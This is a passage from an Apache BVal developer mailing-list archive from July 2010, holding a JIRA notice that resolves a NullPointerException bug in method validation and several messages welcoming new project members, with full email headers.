at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:44) > at org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:15) > at org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:41) > at org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:20) > at org.springframework.test.context.junit4.statements.RunBeforeTestMethodCallbacks.evaluate(RunBeforeTestMethodCallbacks.java:74) > at org.springframework.test.context.junit4.statements.RunAfterTestMethodCallbacks.evaluate(RunAfterTestMethodCallbacks.java:82) > at org.springframework.test.context.junit4.statements.SpringRepeat.evaluate(SpringRepeat.java:72) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:240) > at org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:50) > at org.junit.runners.ParentRunner$3.run(ParentRunner.java:193) > at org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:52) > at org.junit.runners.ParentRunner.runChildren(ParentRunner.java:191) > at org.junit.runners.ParentRunner.access$000(ParentRunner.java:42) > at org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:184) > at org.springframework.test.context.junit4.statements.RunBeforeTestClassCallbacks.evaluate(RunBeforeTestClassCallbacks.java:61) > at org.springframework.test.context.junit4.statements.RunAfterTestClassCallbacks.evaluate(RunAfterTestClassCallbacks.java:70) > at org.junit.runners.ParentRunner.run(ParentRunner.java:236) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.run(SpringJUnit4ClassRunner.java:180) > at org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:49) > at org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:467) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:683) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:390) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:197) > {noformat} -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Jul 07 21:44:47 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62033 invoked from network); 7 Jul 2010 21:44:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Jul 2010 21:44:46 -0000 Received: (qmail 64103 invoked by uid 500); 7 Jul 2010 21:44:46 -0000 Delivered-To: [email protected] Received: (qmail 64067 invoked by uid 500); 7 Jul 2010 21:44:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64059 invoked by uid 99); 7 Jul 2010 21:44:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 21:44:46 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gy0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 21:44:38 +0000 Received: by gyc15 with SMTP id 15so75759gyc.6 for <[email protected]>; Wed, 07 Jul 2010 14:43:15 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=Qh1430biJAoMOD4bMnoV2UXAURplKXej/8IJQNJmSsE=; b=ueYXvnYB2jMxbaSBaFIXvohMhlh2O4XuN1CwTX13Rgra9NaqUUHEC8yLxHtYivVTtt uJLgBBsuiWODec2r/v+BW+HqwgqGiF33+eu3aI6jhuuilSVO13XpqPnFHQJOywgz1FPv pLnN4tUKSlDEEMyBRXO4yPKR9GsbHm6jFUn9g= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=AceO6o1qkk9RXrWnc8qTsIyZhXIlYWLp2WR8ycvOKGTc1mlruXggKxxqbhcXf495Qr 7eLFLx5bhu0khatxhTz8FygmFpuwKOG8NqoK0jXaXzRLduo8HhmHUoJ7x/dmhTIaDPSf FYTnaWPS5N8y/0FyBLPhzuGRpVLxoo4fbV25M= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id k7mr8211255ang.8.1278538995210; Wed, 07 Jul 2010 14:43:15 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 7 Jul 2010 14:43:15 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Wed, 7 Jul 2010 22:43:15 +0100 Message-ID: <[email protected]> Subject: Re: [ANNOUNCE] Welcome Carlos Vara as a new BVAL PPMC member From: Carlos Vara <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016368e1e39a419fc048ad30ee7 X-Virus-Checked: Checked by ClamAV on apache.org --0016368e1e39a419fc048ad30ee7 Content-Type: text/plain; charset=ISO-8859-1 Thanks everybody! On Wed, Jul 7, 2010 at 4:39 PM, Matt Benson <[email protected]> wrote: > Congratulations, Carlos! -Matt > > On Jul 7, 2010, at 10:38 AM, Donald Woods wrote: > > > The BVAL PPMC extended PMC membership to Carlos and he has accepted. > > Welcome aboard Carlos! > > > > -Donald > > --0016368e1e39a419fc048ad30ee7-- From [email protected] Wed Jul 07 22:46:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81891 invoked from network); 7 Jul 2010 22:46:45 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Jul 2010 22:46:45 -0000 Received: (qmail 31088 invoked by uid 500); 7 Jul 2010 22:46:45 -0000 Delivered-To: [email protected] Received: (qmail 31051 invoked by uid 500); 7 Jul 2010 22:46:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31042 invoked by uid 99); 7 Jul 2010 22:46:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 22:46:45 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 22:46:42 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o67Mcpl5009946 for <[email protected]>; Wed, 7 Jul 2010 22:38:51 GMT Message-ID: <3211359.249051278542331001.JavaMail.jira@thor> Date: Wed, 7 Jul 2010 18:38:50 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (BVAL-72) NPE when doing methodvalidation In-Reply-To: <18948177.122061277844170577.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-72?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara resolved BVAL-72. ----------------------------- Fix Version/s: 0.2-incubating Resolution: Fixed Solved. Also, in r960471 code was added to throw a ValidationException instead of a NPE in case no matching method is found on the holder object. > NPE when doing methodvalidation > ------------------------------- > > Key: BVAL-72 > URL: https://issues.apache.org/jira/browse/BVAL-72 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Environment: JDK 1.5, spring 3.0.3 > Reporter: David J. M. Karlsen > Assignee: Carlos Vara > Fix For: 0.2-incubating > > Attachments: bval72.zip > > > I get an npe when calling this annotated method (the annotations are on the implementation class - not on the interface): > findUser( @Size( min=1 ) String param1, > @NotNull String param2, > @NotNull SomeClass param3 ) > It ends up not findin a MethodDescriptor, this it's null when attempting to call method validation. > {noformat} > java.lang.NullPointerException > at org.apache.bval.jsr303.extensions.MethodValidatorImpl.validateParameters(MethodValidatorImpl.java:86) > at com.edb.payment.pays.core.util.aop.validation.ValidationAspect.validate(ValidationAspect.java:67) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:603) > at org.springframework.aop.aspectj.AspectJMethodBeforeAdvice.before(AspectJMethodBeforeAdvice.java:39) > at org.springframework.aop.framework.adapter.MethodBeforeAdviceInterceptor.invoke(MethodBeforeAdviceInterceptor.java:49) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:110) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:89) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202) > at $Proxy21.findUser(Unknown Source) > at com.edb.payment.pays.core.service.user.UserServiceImplTest.findUserThatExists(UserServiceImplTest.java:27) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:44) > at org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:15) > at org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:41) > at org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:20) > at org.springframework.test.context.junit4.statements.RunBeforeTestMethodCallbacks.evaluate(RunBeforeTestMethodCallbacks.java:74) > at org.springframework.test.context.junit4.statements.RunAfterTestMethodCallbacks.evaluate(RunAfterTestMethodCallbacks.java:82) > at org.springframework.test.context.junit4.statements.SpringRepeat.evaluate(SpringRepeat.java:72) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:240) > at org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:50) > at org.junit.runners.ParentRunner$3.run(ParentRunner.java:193) > at org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:52) > at org.junit.runners.ParentRunner.runChildren(ParentRunner.java:191) > at org.junit.runners.ParentRunner.access$000(ParentRunner.java:42) > at org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:184) > at org.springframework.test.context.junit4.statements.RunBeforeTestClassCallbacks.evaluate(RunBeforeTestClassCallbacks.java:61) > at org.springframework.test.context.junit4.statements.RunAfterTestClassCallbacks.evaluate(RunAfterTestClassCallbacks.java:70) > at org.junit.runners.ParentRunner.run(ParentRunner.java:236) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.run(SpringJUnit4ClassRunner.java:180) > at org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:49) > at org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:467) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:683) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:390) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:197) > {noformat} -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jul 08 14:21:21 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33847 invoked from network); 8 Jul 2010 14:21:21 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 14:21:21 -0000 Received: (qmail 8031 invoked by uid 500); 8 Jul 2010 14:21:21 -0000 Delivered-To: [email protected] Received: (qmail 8005 invoked by uid 500); 8 Jul 2010 14:21:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7997 invoked by uid 99); 8 Jul 2010 14:21:20 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 14:21:20 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ww0-f41.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 14:21:12 +0000 Received: by wwb34 with SMTP id 34so456806wwb.0 for <[email protected]>; Thu, 08 Jul 2010 07:20:52 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=aQTRvuT8z5yb6EOQfMgLHGxbcq5t0vpk3z96QB5HT/U=; b=tjHmicvF4ikJo+3FvwGr4+cmpqlu4nyslX8O9yZVLxTcMtbq47PvqsVLxV+kY1YELl z4wpTobpRiNwOLwKLiFtFmWUYr8ffnZBRSSQqs71zL710Jp1TsA87f5afYHQsiiXBaPd sWno8G+yLOJI1DHKl8cYWNqDpSOhPW86vvr2o= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=tenrb3LeXqT6jG5VKL0SfU7LHHRA9PhVm2HS1/eMdIuEBpxCwAF+G9iDnAXYgx+rGU Qzxg40IpFTCYCexIT1816u6hb6q3yNz6LwPZCXBkwCTCYtZ6ALxGGVnLw7X/TfOrmGAq riP5Tf+aGMWCvoXo5Kb3jbGUafwb4e3ga/iGE= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id k12mr6787156wbv.85.1278598849137; Thu, 08 Jul 2010 07:20:49 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 8 Jul 2010 07:20:48 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Thu, 8 Jul 2010 09:20:48 -0500 Message-ID: <[email protected]> Subject: Re: [ANNOUNCE] Welcome Carlos Vara as a new BVAL PPMC member From: Jeremy Bauer <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e65863fe368e39048ae0fe2f X-Virus-Checked: Checked by ClamAV on apache.org --0016e65863fe368e39048ae0fe2f Content-Type: text/plain; charset=ISO-8859-1 Congrats, Carlos! -Jeremy On Wed, Jul 7, 2010 at 10:38 AM, Donald Woods <[email protected]> wrote: > The BVAL PPMC extended PMC membership to Carlos and he has accepted. > Welcome aboard Carlos! > > -Donald > --0016e65863fe368e39048ae0fe2f-- From [email protected] Thu Jul 08 14:48:18 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41557 invoked from network); 8 Jul 2010 14:48:18 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 14:48:18 -0000 Received: (qmail 43267 invoked by uid 500); 8 Jul 2010 14:48:18 -0000 Delivered-To: [email protected] Received: (qmail 43231 invoked by uid 500); 8 Jul 2010 14:48:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43222 invoked by uid 99); 8 Jul 2010 14:48:17 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 14:48:17 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gy0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 14:48:10 +0000 Received: by gyc15 with SMTP id 15so458063gyc.6 for <[email protected]>; Thu, 08 Jul 2010 07:46:48 -0700 (PDT) Received: by 161.129.204.104 with SMTP id q41mr454298yba.209.1278600407445; Thu, 08 Jul 2010 07:46:47 -0700 (PDT) MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with HTTP; Thu, 8 Jul 2010 07:46:27 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> From: Senaka Fernando <[email protected]> Date: Thu, 8 Jul 2010 20:16:27 +0530 X-Google-Sender-Auth: UyRjWK2JfYytY46cG1jljvJpqeo Message-ID: <[email protected]> Subject: Re: [ANNOUNCE] Welcome Carlos Vara as a new BVAL PPMC member To: [email protected] Content-Type: multipart/alternative; boundary=000e0cd5939c18d3a1048ae15bb3 X-Virus-Checked: Checked by ClamAV on apache.org --000e0cd5939c18d3a1048ae15bb3 Content-Type: text/plain; charset=ISO-8859-1 Congrats Carlos! Thanks, Senaka. On Thu, Jul 8, 2010 at 7:50 PM, Jeremy Bauer <[email protected]> wrote: > Congrats, Carlos! > -Jeremy > On Wed, Jul 7, 2010 at 10:38 AM, Donald Woods <[email protected]> wrote: > > > The BVAL PPMC extended PMC membership to Carlos and he has accepted. > > Welcome aboard Carlos! > > > > -Donald > > > --000e0cd5939c18d3a1048ae15bb3-- From [email protected] Thu Jul 08 16:43:34 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77693 invoked from network); 8 Jul 2010 16:43:34 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 16:43:34 -0000 Received: (qmail 16927 invoked by uid 500); 8 Jul 2010 16:43:34 -0000 Delivered-To: [email protected] Received: (qmail 16904 invoked by uid 500); 8 Jul 2010 16:43:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16896 invoked by uid 99); 8 Jul 2010 16:43:33 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 16:43:33 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp101.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 08 Jul 2010 16:43:26 +0000 Received: (qmail 8150 invoked from network); 8 Jul 2010 16:43:05 -0000 Received: from drwoods-009037240139.raleigh.ibm.com ([email protected] with plain) by smtp101.prem.mail.ac4.yahoo.com with SMTP; 08 Jul 2010 09:43:04 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: ymLW04YVM1mPC3bXe9wZ04SxPf84PzT6_0GIjtmawQ9.9rU Zpp1YYvKdB4z2RgPfvJB8LoGIdKm61QzR.cR6piLLXaNvAd0lbWkjCq9SU0y N2_AMe1Rt2RNbfO6IuVulWtW77o9.wDIWWTdzCtdrvbI_zyuiz42ftpOykdj jFNcmDQfTa6oaLWNrDQ65MhC0uYG2rpbUJ.o.143usmUre_Ci_6bpw1N.cjM uKPP_QjXpBKFDgucXYkGtJhDhENcq_FYE0qEuRfA.KjWz3NvBdEyaI1uhFDG aNQnVuhQOXL.416r1MEGPqaqLJTw- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Thu, 08 Jul 2010 12:43:04 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] CC: [email protected] Subject: [ANNOUNCE] Welcome David Jencks as a new Committer X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org The BVAL PPMC recently extended committer karma to David and he has accepted. Welcome aboard David! -Donald From [email protected] Thu Jul 08 16:49:19 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78697 invoked from network); 8 Jul 2010 16:49:18 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 16:49:18 -0000 Received: (qmail 23037 invoked by uid 500); 8 Jul 2010 16:49:18 -0000 Delivered-To: [email protected] Received: (qmail 22994 invoked by uid 500); 8 Jul 2010 16:49:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22986 invoked by uid 99); 8 Jul 2010 16:49:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 16:49:18 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-yx0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 16:49:09 +0000 Received: by yxl31 with SMTP id 31so195560yxl.6 for <[email protected]>; Thu, 08 Jul 2010 09:48:48 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:content-type:mime-version :subject:from:in-reply-to:date:content-transfer-encoding:message-id :references:to:x-mailer; bh=Hyc6rwtg5E5IC7Zy9pioK53+0FQLZDNoAEveOTAbVqY=; b=MO6t3hdvxur4ZYLwWDSDfQxP3UXcPMXdagJpDraSXbQRaN7C94bnMjlkEwZCWQDRGh +RTkR0livt4rMQ1+kqKMCI6oFSQuAGBDNtyjjw+aun3J2cD0TfrDQ+vevlZIoDnAHhRE 206MzNbV5DwpkSlVthWSEBEheawSDQodLxXr0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=content-type:mime-version:subject:from:in-reply-to:date :content-transfer-encoding:message-id:references:to:x-mailer; b=dNFN/+DgaeTD5pPqjmqbXuSVVFIZG5GZDuJPpidd0VoLYmQcW08fJG4l+ojwmGSY7c abf2KvbySd1kOHiRhGm6GLKPRrXBcdd2HfxQiSo0xBg+wlNwHwtUDeeO04m9B/9jRkwZ ZdoV+FmAYUQzrWeJJ2SwbqNCR/wewDP1YQdRQ= Received: by 161.129.204.104 with SMTP id m26mr10296141ann.204.1278607728108; Thu, 08 Jul 2010 09:48:48 -0700 (PDT) Received: from [161.129.204.104] (adsl-068-213-090-227.sip.bhm.bellsouth.net [161.129.204.104]) by mx.google.com with ESMTPS id t24sm80639880ano.12.2161.129.204.104.48.47 (version=TLSv1/SSLv3 cipher=RC4-MD5); Thu, 08 Jul 2010 09:48:47 -0700 (PDT) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1081) Subject: Re: [ANNOUNCE] Welcome David Jencks as a new Committer From: Matt Benson <[email protected]> In-Reply-To: <[email protected]> Date: Thu, 8 Jul 2010 11:48:45 -0500 Content-Transfer-Encoding: 7bit Message-Id: <[email protected]> References: <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org Congratulations, David! -Matt On Jul 8, 2010, at 11:43 AM, Donald Woods wrote: > The BVAL PPMC recently extended committer karma to David and he has > accepted. Welcome aboard David! > > -Donald From [email protected] Thu Jul 08 17:04:42 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82572 invoked from network); 8 Jul 2010 17:04:41 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 17:04:41 -0000 Received: (qmail 35918 invoked by uid 500); 8 Jul 2010 17:04:41 -0000 Delivered-To: [email protected] Received: (qmail 35759 invoked by uid 500); 8 Jul 2010 17:04:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35622 invoked by uid 99); 8 Jul 2010 17:04:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 17:04:40 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gx0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 17:04:32 +0000 Received: by gxk1 with SMTP id 1so596298gxk.6 for <[email protected]>; Thu, 08 Jul 2010 10:04:12 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=sga62La9pJtq4IwvAoT5TWyZNMRSpkKuCq+/kLrCiQU=; b=hHtrI299pQqJDWL1oqmXbBWCttQO4xQdOHT/gJXr822zKGdt85zAAH13d1NedBZBfv /0dc2O2PU/ISfOUl5NZHeICa1D1lop2UDyyCCqo+vK7Yxx+lVO9xaWmDYpH+wlUjrF6y Bud4v9ZD5u1yk5u+yW4mUQlOXRLOwsnSkoShQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=UQY61TRWqlRUPiZn3Mdh9JfZ32gUJ8Tim1TO88F286/FF61+z+qGtgR8gwf9wFE3P0 Bu7dPwHms0UxI3TgzSedZUl+8hjMMDS4F4nCYwGm1t26o8MvVoi5ZlTRV4DNpG5bA6bE zlxu1bVFW0gKwEMmXlPpfTX31zYXCtoSFVJl4= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id l2mr9957116ane.265.1278608651820; Thu, 08 Jul 2010 10:04:11 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 8 Jul 2010 10:04:11 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Thu, 8 Jul 2010 18:04:11 +0100 Message-ID: <[email protected]> Subject: Re: [ANNOUNCE] Welcome David Jencks as a new Committer From: Carlos Vara <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e6441c3a7f9def048ae34677 X-Virus-Checked: Checked by ClamAV on apache.org --0016e6441c3a7f9def048ae34677 Content-Type: text/plain; charset=ISO-8859-1 Congrats and welcome to the team David! On Thu, Jul 8, 2010 at 5:48 PM, Matt 